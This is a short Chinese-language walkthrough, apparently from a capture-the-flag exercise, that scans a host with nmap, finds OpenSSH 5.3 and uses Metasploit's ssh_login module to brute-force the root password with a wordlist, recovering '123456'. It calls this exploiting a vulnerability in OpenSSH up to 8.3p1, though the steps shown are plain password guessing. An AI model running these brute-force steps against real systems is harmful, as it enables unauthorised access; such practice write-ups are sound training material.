通过nmap扫描目标主机发现ssh版本为OpenSSH 5.3,有漏洞
漏洞影响版本(OpenSSH =< 8.3p1)
使用msfconsole 工具
search ssh #查找有关ssh的漏洞
找到并使用漏洞use auxiliary/scanner/ssh/ssh_login
show options #查看此漏洞需要的配置信息
set RHOSTS #配置目标主机ip
set USERNAME #设置用户名(题目已知用户名为root)
set PASS_FILE #配置爆破密码所需字典(一般题目自带字典)
set THREADS #配置线程
run 或 exploit #执行漏洞
爆破成功,获取密码:123456